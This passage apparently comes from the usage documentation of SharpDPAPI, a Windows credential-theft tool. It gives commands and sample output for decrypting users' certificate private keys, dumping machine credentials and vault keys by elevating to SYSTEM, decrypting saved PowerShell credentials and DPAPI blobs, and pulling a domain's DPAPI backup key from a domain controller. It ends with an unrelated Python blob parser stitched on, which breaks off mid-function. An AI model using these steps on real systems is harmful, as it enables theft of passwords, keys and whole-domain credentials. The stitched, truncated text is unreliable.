: 3/1/2021 1:38:22 PM\r\n Modified : 1/4/2021 5:49:49 PM\r\n guidMasterKey : {dab90445-0a08-4b27-9110-b75d4a7894d0}\r\n size : 210\r\n flags : 0x0\r\n algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)\r\n description :\r\n Key Bytes : 39 2E 63 EF 0E 37 E8 5C 34 ...\r\nSharpDPAPI completed in 00:00:00.0566660\r\ncertificates\r\nThe certificates command will search for user-encrypted DPAPI certificate private keys and either a) decrypt them with any \"\r\n{GUID}:SHA1\" masterkeys passed, b) a /mkfile:FILE of one or more {GUID}:SHA1 masterkey mappings, c)\r\nuse a supplied DPAPI domain backup key ( /pvk:BASE64... or /pvk:key.pvk ) to first decrypt any user\r\nmasterkeys (a la masterkeys), or d) a /password:X to decrypt any user masterkeys, which are then used as a\r\nlookup decryption table. 
DPAPI GUID mappings can be recovered with Mimikatz' sekurlsa::dpapi command.\r\nThe /unprotect flag will use CryptUnprotectData() to decrypt private keys, if the command is run from the user\r\ncontext whose certificates you are trying to access. This can be done from an unprivileged context, without the\r\nneed to touch LSASS. For why this approach isn't used for credentials/vaults, see Benjamin's documentation here.\r\nA specific certificate private key file (or a folder of them) can be specified with /target:FILE or /target:C:\\Folder\\ . If a file is\r\nspecified, {GUID}:SHA1 values (or /unprotect ) are required; if a folder is specified, either a) {GUID}:SHA1 values must be\r\nsupplied or b) the folder must contain DPAPI masterkeys and a /pvk domain backup key must be supplied.\r\nBy default, only private keys linkable to an associated installed certificate are displayed. The /showall\r\nflag will display ALL decrypted private keys.\r\nUse the /cng flag for CNG private keys (default is capi).\r\nUsing domain {GUID}:SHA1 masterkey mappings:\r\nC:\\Temp\u003e SharpDPAPI.exe certificates {dab90445-0a08-4b27-9110-b75d4a7894d0}:C23AF7432EB513717AA...(snip)...\r\n __ _ _ _ ___\r\n (_ |_ _.
._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.10.0\r\n[*] Action: Certificate Triage\r\nFolder : C:\\Users\\harmj0y\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-937929760-3187473010-80948926-1104\r\n File : 34eaff3ec61d0f012ce1a0cb4c10c053_6c712ef3-1467-4f96-bb5c-6737ba66cfb0\r\n Provider GUID : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}\r\n Master Key GUID : {dab90445-0a08-4b27-9110-b75d4a7894d0}\r\n Description : CryptoAPI Private Key\r\n algCrypt : CALG_3DES (keyLen 192)\r\n algHash : CALG_SHA (32772)\r\n Salt : ef98458bca7135fe1bb89b3715180ae6\r\n HMAC : 5c3c3da2a4f6548a0186c22f86d7bc85\r\n Unique Name : te-UserMod-8c8e0236-76ca-4a36-b4d5-24eaf3c3e1da\r\n Thumbprint : 98A03BC583861DCC19045758C0E0C05162091B6C\r\n Issuer : CN=theshire-DC-CA, DC=theshire, DC=local\r\n Subject : CN=harmj0y\r\n Valid Date : 2/22/2021 2:19:02 PM\r\n Expiry Date : 2/22/2022 2:19:02 PM\r\n Enhanced Key Usages:\r\n Client Authentication (1.3.6.1.5.5.7.3.2)\r\n [!] Certificate is used for client auth!\r\n Secure Email (1.3.6.1.5.5.7.3.4)\r\n Encrypting File System (1.3.6.1.4.1.311.10.3.4)\r\n [*] Private key file 34eaff3ec61d0f012ce1a0cb4c10c053_6c712ef3-1467-4f96-bb5c-6737ba66cfb0 was recovered:\r\n-----BEGIN RSA PRIVATE KEY-----\r\nMIIEpAIBAAKCAQEA0WDgv/jH5HuATtPgQSBie5t...(snip)...\r\n-----END RSA PRIVATE KEY-----\r\n-----BEGIN CERTIFICATE-----\r\nMIIFujCCBKKgAwIBAgITVQAAAJf6yKyhm5SBVwA...(snip)...\r\n-----END CERTIFICATE-----\r\nUsing /unprotect to decrypt any found user certificates:\r\nC:\\Temp\u003e SharpDPAPI.exe certificates /unprotect\r\n __ _ _ _ ___\r\n (_ |_ _.
._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.11.3\r\n[*] Action: Certificate Triage\r\n[*] Using CryptUnprotectData() for decryption.\r\nFolder : C:\\Users\\harmj0y\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-937929760-3187473010-80948926-1104\r\n File : f29fa2bb6de62b7d966a407ef203ac45_3fef0615-487e-485b-84b0-193b510dec3b\r\n Provider GUID : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}\r\n Master Key GUID : {27db0044-e2aa-4ea2-b2c0-c469e9b29ed9}\r\n Description : Private Key\r\n algCrypt : CALG_AES_256 (keyLen 256)\r\n algHash : CALG_SHA_512 (32782)\r\n Salt : d7e1e00ed8a6249b5f05c487154e83cc0b51f71131530d0d46d3bfc63d890468\r\n HMAC : 4869f296cdcc964262a57e2efc4f2c5df57c2ed7319e297daa2107810da5c171\r\n Unique Name : {4A07001C-57BE-4E8B-86D1-43CACDF8D448}\r\n Thumbprint : BBD9B90FE1A4E37BD646CBC922ABE06C24C1E725\r\n Issuer : CN=theshire-DC-CA, DC=theshire, DC=local\r\n Subject : CN=harmj0y\r\n Valid Date : 10/18/2022 11:40:07 AM\r\n Expiry Date : 10/18/2023 12:00:07 PM\r\n Enhanced Key Usages:\r\n Client Authentication (1.3.6.1.5.5.7.3.2)\r\n [!] Certificate is used for client auth!\r\n Server Authentication (1.3.6.1.5.5.7.3.1)\r\n [*] Private key file f29fa2bb6de62b7d966a407ef203ac45_3fef0615-487e-485b-84b0-193b510dec3b was recovered:\r\n-----BEGIN RSA PRIVATE KEY-----\r\nMIIEowIBAAKCAQEAxVEW49fMt...(snip)...\r\n-----END RSA PRIVATE KEY-----\r\n-----BEGIN CERTIFICATE-----\r\nMIIDKjCCAhKgAwIBAgIQYwhUr...(snip)...\r\n-----END CERTIFICATE-----\r\nUsing a domain DPAPI backup key to first decrypt any discoverable masterkeys:\r\nC:\\Temp\u003eSharpDPAPI.exe certificates /pvk:HvG1sAAAAAABAAAAAAAAAAAAAACU...(snip)...\r\n __ _ _ _ ___\r\n (_ |_ _.
._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.10.0\r\n[*] Action: Certificate Triage\r\n[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!\r\n[*] User master key cache:\r\n{dab90445-0a08-4b27-9110-b75d4a7894d0}:C23AF7432EB51371...(snip)...\r\nFolder : C:\\Users\\harmj0y\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-937929760-3187473010-80948926-1104\r\n File : 34eaff3ec61d0f012ce1a0cb4c10c053_6c712ef3-1467-4f96-bb5c-6737ba66cfb0\r\n Provider GUID : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}\r\n Master Key GUID : {dab90445-0a08-4b27-9110-b75d4a7894d0}\r\n Description : CryptoAPI Private Key\r\n algCrypt : CALG_3DES (keyLen 192)\r\n algHash : CALG_SHA (32772)\r\n Salt : ef98458bca7135fe1bb89b3715180ae6\r\n HMAC : 5c3c3da2a4f6548a0186c22f86d7bc85\r\n Unique Name : te-UserMod-8c8e0236-76ca-4a36-b4d5-24eaf3c3e1da\r\n Thumbprint : 98A03BC583861DCC19045758C0E0C05162091B6C\r\n Issuer : CN=theshire-DC-CA, DC=theshire, DC=local\r\n Subject : CN=harmj0y\r\n Valid Date : 2/22/2021 2:19:02 PM\r\n Expiry Date : 2/22/2022 2:19:02 PM\r\n Enhanced Key Usages:\r\n Client Authentication (1.3.6.1.5.5.7.3.2)\r\n [!]
Certificate is used for client auth!\r\n Secure Email (1.3.6.1.5.5.7.3.4)\r\n Encrypting File System (1.3.6.1.4.1.311.10.3.4)\r\n [*] Private key file 34eaff3ec61d0f012ce1a0cb4c10c053_6c712ef3-1467-4f96-bb5c-6737ba66cfb0 was recovered:\r\n-----BEGIN RSA PRIVATE KEY-----\r\nMIIEpAIBAAKCAQEA0WDgv/jH5HuATtPgQSBie5t...(snip)...\r\n-----END RSA PRIVATE KEY-----\r\n-----BEGIN CERTIFICATE-----\r\nMIIFujCCBKKgAwIBAgITVQAAAJf6yKyhm5SBVwA...(snip)...\r\n-----END CERTIFICATE-----\r\ntriage\r\nThe triage command runs the user credentials, vaults, rdg, and certificates commands.\r\nMachine Triage\r\nmachinemasterkeys\r\nThe machinemasterkeys command will elevate to SYSTEM to retrieve the DPAPI_SYSTEM LSA secret, which\r\nis then used to decrypt any found machine DPAPI masterkeys. It will return a set of masterkey {GUID}:SHA1\r\nmappings.\r\nLocal administrative rights are needed (so we can retrieve the DPAPI_SYSTEM LSA secret).\r\nC:\\Temp\u003eSharpDPAPI.exe machinemasterkeys\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.2.0\r\n[*] Action: Machine DPAPI Masterkey File Triage\r\n[*] Elevating to SYSTEM via token duplication for LSA secret retrieval\r\n[*] RevertToSelf()\r\n[*] Secret : DPAPI_SYSTEM\r\n[*] full: DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF6C88CEFD23D0291FA9FE46899D4DE12A180E76C3\r\n[*] m/u : DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF / 6C88CEFD23D0291FA9FE46899D4DE12A180E76C3\r\n[*] SYSTEM master key cache:\r\n{1e76e1ee-1c53-4350-9a3d-7dec7afd024a}:4E4193B4C4D2F0420E0656B5F83D03754B565A0C\r\n...(snip)...\r\nmachinecredentials\r\nThe machinecredentials command will elevate to SYSTEM to retrieve the DPAPI_SYSTEM LSA secret, which\r\nis then used to decrypt any found machine DPAPI masterkeys.
These keys are then used to decrypt any found\r\nmachine Credential files.\r\nLocal administrative rights are needed (so we can retrieve the DPAPI_SYSTEM LSA secret).\r\nC:\\Temp\u003eSharpDPAPI.exe machinecredentials\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.2.0\r\n[*] Action: Machine DPAPI Credential Triage\r\n[*] Elevating to SYSTEM via token duplication for LSA secret retrieval\r\n[*] RevertToSelf()\r\n[*] Secret : DPAPI_SYSTEM\r\n[*] full: DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF6C88CEFD23D0291FA9FE46899D4DE12A180E76C3\r\n[*] m/u : DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF / 6C88CEFD23D0291FA9FE46899D4DE12A180E76C3\r\n[*] SYSTEM master key cache:\r\n{1e76e1ee-1c53-4350-9a3d-7dec7afd024a}:4E4193B4C4D2F0420E0656B5F83D03754B565A0C\r\n...(snip)...\r\n[*] Triaging System Credentials\r\nFolder : C:\\WINDOWS\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Credentials\r\n CredFile : C73A55F92FAE222C18A8989FEA28A1FE\r\n guidMasterKey : {1cb83cb5-96cd-445d-baac-49e97f4eeb72}\r\n size : 544\r\n flags : 0x20000000 (CRYPTPROTECT_SYSTEM)\r\n algHash/algCrypt : 32782/26128\r\n description : Local Credential Data\r\n LastWritten : 3/24/2019 7:08:43 PM\r\n TargetName : Domain:batch=TaskScheduler:Task:{B745BF75-D62D-4B1C-84ED-F0437214ECED}\r\n TargetAlias :\r\n Comment :\r\n UserName : TESTLAB\\harmj0y\r\n Credential : Password123!\r\nFolder : C:\\WINDOWS\\ServiceProfiles\\LocalService\\AppData\\Local\\Microsoft\\Credentials\r\n CredFile : DFBE70A7E5CC19A398EBF1B96859CE5D\r\n ...(snip)...\r\nmachinevaults\r\nThe machinevaults command will elevate to SYSTEM to retrieve the DPAPI_SYSTEM LSA secret, which is\r\nthen used to decrypt any found machine DPAPI masterkeys.
These keys are then used to decrypt any found\r\nmachine Vaults.\r\nLocal administrative rights are needed (so we can retrieve the DPAPI_SYSTEM LSA secret).\r\nC:\\Temp\u003eSharpDPAPI.exe machinevaults\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.2.0\r\n[*] Action: Machine DPAPI Vault Triage\r\n[*] Elevating to SYSTEM via token duplication for LSA secret retrieval\r\n[*] RevertToSelf()\r\n[*] Secret : DPAPI_SYSTEM\r\n[*] full: DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF6C88CEFD23D0291FA9FE46899D4DE12A180E76C3\r\n[*] m/u : DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF / 6C88CEFD23D0291FA9FE46899D4DE12A180E76C3\r\n[*] SYSTEM master key cache:\r\n{1e76e1ee-1c53-4350-9a3d-7dec7afd024a}:4E4193B4C4D2F0420E0656B5F83D03754B565A0C\r\n...(snip)...\r\n[*] Triaging SYSTEM Vaults\r\n[*] Triaging Vault folder: C:\\WINDOWS\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Vault\\4BF4C442-9B8A-\r\n VaultID : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28\r\n Name : Web Credentials\r\n guidMasterKey : {0bd732d9-c396-4f9a-a69a-508632c05235}\r\n size : 324\r\n flags : 0x20000000 (CRYPTPROTECT_SYSTEM)\r\n algHash/algCrypt : 32782/26128\r\n description :\r\n aes128 key : 74CE3D7BCC4D0C4734931041F6D00D09\r\n aes256 key : B497F57730A2F29C3533B76BD6B33EEA231C1F51ED933E0CA1210B9E3A16D081\r\n...(snip)...\r\ncertificates /machine\r\nThe certificates /machine command will use the machine certificate store to look for decryptable machine\r\ncertificate private keys. /mkfile:X and {GUID}:masterkey are usable with the /target:[file|folder]\r\nargument; otherwise SharpDPAPI will elevate to SYSTEM to retrieve the DPAPI_SYSTEM LSA secret, which is\r\nthen used to decrypt any found machine DPAPI masterkeys.
These keys are then used to decrypt any found\r\nmachine DPAPI-encrypted certificate private keys.\r\nBy default, only private keys linkable to an associated installed certificate are displayed. The /showall\r\nflag will display ALL decrypted private keys.\r\nLocal administrative rights are needed (so we can retrieve the DPAPI_SYSTEM LSA secret).\r\nC:\\Temp\u003eSharpDPAPI.exe certificates /machine\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.10.0\r\n[*] Action: Certificate Triage\r\n[*] Elevating to SYSTEM via token duplication for LSA secret retrieval\r\n[*] RevertToSelf()\r\n[*] Secret : DPAPI_SYSTEM\r\n[*] full: DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF6C88CEFD23D0291FA9FE46899D4DE12A180E76C3\r\n[*] m/u : DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF / 6C88CEFD23D0291FA9FE46899D4DE12A180E76C3\r\n[*] SYSTEM master key cache:\r\n{f12f57e1-dd41-4daa-88f1-37a64034c7e9}:3AEB121ECF2...(snip)...\r\n[*] Triaging System Certificates\r\nFolder : C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\r\n File : 9377cea385fa1e5bf7815ee2024d0eea_6c712ef3-1467-4f96-bb5c-6737ba66cfb0\r\n Provider GUID : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}\r\n Master Key GUID : {f12f57e1-dd41-4daa-88f1-37a64034c7e9}\r\n Description : CryptoAPI Private Key\r\n algCrypt : CALG_3DES (keyLen 192)\r\n algHash : CALG_SHA (32772)\r\n Salt : aa8c9e4849455660fc5fc96589f3e40e\r\n HMAC : 9138559ef30fbd70808dca2c1ed02a29\r\n Unique Name : te-Machine-50500b00-fddb-4a0d-8aa6-d73404473650\r\n Thumbprint : A82ED8207DF6BC16BB65BF6A91E582263E217A4A\r\n Issuer : CN=theshire-DC-CA, DC=theshire, DC=local\r\n Subject : CN=dev.theshire.local\r\n Valid Date : 2/22/2021 3:50:43 PM\r\n Expiry Date : 2/22/2022 3:50:43 PM\r\n Enhanced Key Usages:\r\n Client Authentication (1.3.6.1.5.5.7.3.2)\r\n [!]
Certificate is used for client auth!\r\n Server Authentication (1.3.6.1.5.5.7.3.1)\r\n [*] Private key file 9377cea385fa1e5bf7815ee2024d0eea_6c712ef3-1467-4f96-bb5c-6737ba66cfb0 was recovered:\r\n-----BEGIN RSA PRIVATE KEY-----\r\nMIIEpAIBAAKCAQEAzRX2ipgM1t9Et4KoP...(snip)...\r\n-----END RSA PRIVATE KEY-----\r\n-----BEGIN CERTIFICATE-----\r\nMIIFOjCCBCKgAwIBAgITVQAAAJqDK8j15...(snip)...\r\n-----END CERTIFICATE-----\r\nmachinetriage\r\nThe machinetriage command runs the machinecredentials, machinevaults, and certificates /machine\r\ncommands.\r\nMisc\r\nps\r\nThe ps command will describe/decrypt an exported PSCredential clixml. A /target:FILE.xml must be supplied.\r\nThe command will a) decrypt the file with any \"{GUID}:SHA1\" masterkeys passed, b) a /mkfile:FILE of one\r\nor more {GUID}:SHA1 masterkey mappings, c) use a supplied DPAPI domain backup key ( /pvk:BASE64... or\r\n/pvk:key.pvk ) to first decrypt any user masterkeys (a la masterkeys), or d) a /password:X to decrypt any user\r\nmasterkeys, which are then used as a lookup decryption table. DPAPI GUID mappings can be recovered with\r\nMimikatz' sekurlsa::dpapi command.\r\nThe /unprotect flag will use CryptUnprotectData() to decrypt the credential .xml without masterkeys needed, if\r\nthe command is run from the user context who saved the passwords. This can be done from an unprivileged\r\ncontext, without the need to touch LSASS. For why this approach isn't used for credentials/vaults, see Benjamin's\r\ndocumentation here.\r\nDecrypt an exported credential .xml using CryptUnprotectData() (the /unprotect flag):\r\nPS C:\\Temp\u003e $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\nPS C:\\Temp\u003e New-Object System.Management.Automation.PSCredential('TESTLAB\\user', $SecPassword) | Export-CLIXml C\r\nPS C:\\Temp\u003e .\\SharpDPAPI.exe ps /target:C:\\Temp\\cred.xml /unprotect\r\n __ _ _ _ ___\r\n (_ |_ _.
._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.5.0\r\n[*] Action: Describe PSCredential .xml\r\n CredFile : C:\\Temp\\cred.xml\r\n Accessed : 7/25/2019 11:53:09 AM\r\n Modified : 7/25/2019 11:53:09 AM\r\n User Name : TESTLAB\\user\r\n guidMasterKey : {0241bc33-44ae-404a-b05d-a35eea8cbc63}\r\n size : 170\r\n flags : 0x0\r\n algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)\r\n description :\r\n Password : Password123!\r\nUsing domain {GUID}:SHA1 masterkey mappings:\r\nPS C:\\Temp\u003e $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\nPS C:\\Temp\u003e New-Object System.Management.Automation.PSCredential('TESTLAB\\user', $SecPassword) | Export-CLIXml C\r\nPS C:\\Temp\u003e .\\SharpDPAPI.exe ps /target:C:\\Temp\\cred.xml \"{0241bc33-44ae-404a-b05d-a35eea8cbc63}:E7E481877B9D51C\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.5.0\r\n[*] Action: Describe PSCredential .xml\r\n[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!\r\n[*] User master key cache:\r\n{0241bc33-44ae-404a-b05d-a35eea8cbc63}:E7E481877B9D51C17E015EB3C1F72FB887363EE3\r\n CredFile : C:\\Temp\\cred.xml\r\n Accessed : 7/25/2019 12:04:12 PM\r\n Modified : 7/25/2019 12:04:12 PM\r\n User Name : TESTLAB\\user\r\n guidMasterKey : {0241bc33-44ae-404a-b05d-a35eea8cbc63}\r\n size : 170\r\n flags : 0x0\r\n algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)\r\n description :\r\n Password : Password123!\r\nUsing a domain DPAPI backup key to first decrypt any discoverable masterkeys:\r\nPS C:\\Temp\u003e $SecPassword = ConvertTo-SecureString 'Password123!'
-AsPlainText -Force\r\nPS C:\\Temp\u003e New-Object System.Management.Automation.PSCredential('TESTLAB\\user', $SecPassword) | Export-CLIXml C\r\nPS C:\\Temp\u003e .\\SharpDPAPI.exe ps /target:C:\\Temp\\cred.xml /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...(snip)...\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.5.0\r\n[*] Action: Describe PSCredential .xml\r\n[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!\r\n[*] User master key cache:\r\n{0241bc33-44ae-404a-b05d-a35eea8cbc63}:E7E481877B9D51C17E015EB3C1F72FB887363EE3\r\n CredFile : C:\\Temp\\cred.xml\r\n Accessed : 7/25/2019 12:04:12 PM\r\n Modified : 7/25/2019 12:04:12 PM\r\n User Name : TESTLAB\\user\r\n guidMasterKey : {0241bc33-44ae-404a-b05d-a35eea8cbc63}\r\n size : 170\r\n flags : 0x0\r\n algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)\r\n description :\r\n Password : Password123!\r\nblob\r\nThe blob command will describe/decrypt a DPAPI blob. A /target:\u003cBASE64|blob.bin\u003e must be supplied.\r\nThe command will a) decrypt the blob with any \"{GUID}:SHA1\" masterkeys passed, b) a /mkfile:FILE of one\r\nor more {GUID}:SHA1 masterkey mappings, c) use a supplied DPAPI domain backup key ( /pvk:BASE64... or\r\n/pvk:key.pvk ) to first decrypt any user masterkeys (a la masterkeys), or d) a /password:X to decrypt any user\r\nmasterkeys, which are then used as a lookup decryption table. DPAPI GUID mappings can be recovered with\r\nMimikatz' sekurlsa::dpapi command.\r\nThe /unprotect flag will use CryptUnprotectData() to decrypt the blob without masterkeys needed, if the\r\ncommand is run from the user context who saved the passwords. This can be done from an unprivileged context,\r\nwithout the need to touch LSASS. 
For why this approach isn't used for credentials/vaults, see Benjamin's\r\ndocumentation here.\r\nDecrypt a blob using CryptUnprotectData() (the /unprotect flag):\r\nC:\\Temp\u003eSharpDPAPI.exe blob /target:C:\\Temp\\blob.bin /unprotect\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.5.0\r\n[*] Action: Describe DPAPI blob\r\n[*] Using CryptUnprotectData() for decryption.\r\n guidMasterKey : {0241bc33-44ae-404a-b05d-a35eea8cbc63}\r\n size : 170\r\n flags : 0x0\r\n algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)\r\n description :\r\n dec(blob) : Password123!\r\nUsing domain {GUID}:SHA1 masterkey mappings:\r\nC:\\Temp\u003eSharpDPAPI.exe blob /target:C:\\Temp\\blob2.bin {0241bc33-44ae-404a-b05d-a35eea8cbc63}:E7E481877B9D51C17E\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.5.0\r\n[*] Action: Describe DPAPI blob\r\n[*] Using CryptUnprotectData() for decryption.\r\n guidMasterKey : {0241bc33-44ae-404a-b05d-a35eea8cbc63}\r\n size : 314\r\n flags : 0x0\r\n algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)\r\n description :\r\n dec(blob) : 01 00 00 00 3F 3F 3F 3F 01 15 3F 11 3F 7A 00 3F 4F 3F 3F ...\r\nUsing a domain DPAPI backup key to first decrypt any discoverable masterkeys:\r\nC:\\Temp\u003eSharpDPAPI.exe blob /target:C:\\Temp\\blob2.bin /pvk:HvG1sAAAAAABAAAAAAAAAAAAAAC...(snip)...\r\n __ _ _ _ ___\r\n (_ |_ _.
._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.5.0\r\n[*] Action: Describe DPAPI blob\r\n[*] Using a domain DPAPI backup key to triage masterkeys for decryption key mappings!\r\n[*] User master key cache:\r\n{0241bc33-44ae-404a-b05d-a35eea8cbc63}:E7E481877B9D51C17E015EB3C1F72FB887363EE3\r\n guidMasterKey : {0241bc33-44ae-404a-b05d-a35eea8cbc63}\r\n size : 314\r\n flags : 0x0\r\n algHash/algCrypt : 32772 (CALG_SHA) / 26115 (CALG_3DES)\r\n description :\r\n dec(blob) : 01 00 00 00 3F 3F 3F 3F 01 15 3F 11 3F 7A 00 3F 4F 3F 3F ...\r\nbackupkey\r\nThe backupkey command will ret��ieve the domain DPAPI backup key from a domain controller using the\r\nLsaRetrievePrivateData API approach from Mimikatz. This private key can then be used to decrypt master key\r\nblobs for any user on the domain. And even better, the key never changes ;)\r\nDomain admin (or equivalent) rights are needed to retrieve the key from a remote domain controller.\r\nThe /nowrap flag will prevent wrapping the base64 key on display.\r\nThis base64 key blob can be decoded to a binary .pvk file that can then be used with Mimikatz' dpapi::masterkey\r\n/in:MASTERKEY /pvk:backupkey.pvk module, or used in blob/file /pvk:X form with the masterkeys,\r\ncredentials, or vaults SharpDPAPI commands.\r\nBy default, SharpDPAPI will try to determine the current domain controller via the DsGetDcName API call. A\r\nserver can be specified with /server:COMPUTER.domain.com . If you want the key saved to disk instead of output\r\nas a base64 blob, use /file:key.pvk .\r\nRetrieve the DPAPI backup key for the current domain controller:\r\nC:\\Temp\u003eSharpDPAPI.exe backupkey\r\n __ _ _ _ ___\r\n (_ |_ _.
._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.2.0\r\n[*] Action: Retrieve domain DPAPI backup key\r\n[*] Using current domain controller : PRIMARY.testlab.local\r\n[*] Preferred backupkey Guid : 32d021e7-ab1c-4877-af06-80473ca3e4d8\r\n[*] Full preferred backupKeyName : G$BCKUPKEY_32d021e7-ab1c-4877-af06-80473ca3e4d8\r\n[*] Key :\r\n HvG1sAAAAAABAAAAAAAAAAAAAACUBAAABwIAAACkAABSU0EyAAgAAA...(snip)...\r\nRetrieve the DPAPI backup key for the specified DC, outputting the backup key to a file:\r\nC:\\Temp\u003eSharpDPAPI.exe backupkey /server:primary.testlab.local /file:key.pvk\r\n __ _ _ _ ___\r\n (_ |_ _. ._ ._ | \\ |_) /\\ |_) |\r\n __) | | (_| | |_) |_/ | /--\\ | _|_\r\n |\r\n v1.2.0\r\n[*] Action: Retrieve domain DPAPI backup key\r\n[*] Using server : primary.testlab.local\r\n[*] Preferred backupkey Guid : 32d021e7-ab1c-4877-af06-80473ca3e4d8\r\n[*] Full preferred backupKeyName : G$BCKUPKEY_32d021e7-ab1c-4877-af06-80473ca3e4d8\r\n[*] Backup key written to : key.pvk\r\nsearch\r\nThe search command will search for potential DPAPI blobs in the registry, files, folders, and base64 blobs. Usage:\r\nSharpDPAPI.exe search /type:registry [/path:HKLM\\path\\to\\key] [/showErrors]\r\nSharpDPAPI.exe search /type:folder /path:C:\\path\\to\\folder [/maxBytes:\u003cnumOfBytes\u003e] [/showErrors]\r\nSharpDPAPI.exe search /type:file /path:C:\\path\\to\\file [/maxBytes:\u003cnumOfBytes\u003e]\r\nSharpDPAPI.exe search /type:base64 [/base:\u003cbase64 string\u003e]\r\nThe search command works by searching for the following bytes, which represent the header (Version + DPAPI\r\nprovider GUID) of the DPAPI blob structure:\r\n0x01, 0x00, 0x00, 0x00, 0xD0, 0x8C, 0x9D, 0xDF, 0x01, 0x15, 0xD1, 0x11, 0x8C, 0x7A, 0x00, 0xC0, 0x4F, 0xC2, 0x9\r\nThe search command has different arguments depending on the data type being scanned.
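The header-signature scan just described, and the clixml handling of the ps command above, as an added example that is not SharpDPAPI's own code: a stdlib-only Python parser for the DPAPI blob structure (field order taken from the Mimikatz KULL_M_DPAPI_BLOB layout that SharpDPAPI ports), a scanner that finds such blobs inside an arbitrary byte buffer the way search does, and a helper that pulls the hex-encoded blob out of an Export-Clixml PSCredential file. The signature bytes are computed from the provider GUID printed as Provider GUID in the certificate output above rather than typed in. The sample blob, the clixml wrapper and the user name user@testlab.local are constructed for this example (the data and sign fields are filler, not real ciphertext), and nothing is decrypted: that needs the masterkey SHA1 the page's commands recover plus a 3DES/AES library.

```python
import re
import struct
import uuid

# Added example, not SharpDPAPI code. Field layout follows the Mimikatz
# KULL_M_DPAPI_BLOB structure that SharpDPAPI ports; all sample data is constructed.

# Provider GUID printed as 'Provider GUID' in the SharpDPAPI output above. The
# search signature is DWORD version 1 followed by this GUID in little-endian form.
DPAPI_PROVIDER_GUID = uuid.UUID('df9d8cd0-1501-11d1-8c7a-00c04fc297eb')
BLOB_SIGNATURE = struct.pack('<I', 1) + DPAPI_PROVIDER_GUID.bytes_le

# ALG_ID values that appear in the output on this page.
ALG_NAMES = {0x6603: 'CALG_3DES', 0x6610: 'CALG_AES_256',
             0x8004: 'CALG_SHA', 0x800E: 'CALG_SHA_512'}
CRYPTPROTECT_SYSTEM = 0x20000000

# Master key GUID from the ps/blob examples above, reused for the constructed blob.
SAMPLE_MASTER_KEY_GUID = uuid.UUID('0241bc33-44ae-404a-b05d-a35eea8cbc63')


def _take(buf, off, n):
    if off + n > len(buf):
        raise ValueError('truncated DPAPI blob at offset %d' % off)
    return buf[off:off + n], off + n


def _take_lv(buf, off):
    # DWORD length prefix followed by that many bytes.
    raw, off = _take(buf, off, 4)
    return _take(buf, off, struct.unpack('<I', raw)[0])


def parse_dpapi_blob(buf, off=0):
    # Returns the fields SharpDPAPI prints for a blob plus the raw ciphertext.
    start = off
    hdr, off = _take(buf, off, 20)
    if hdr != BLOB_SIGNATURE:
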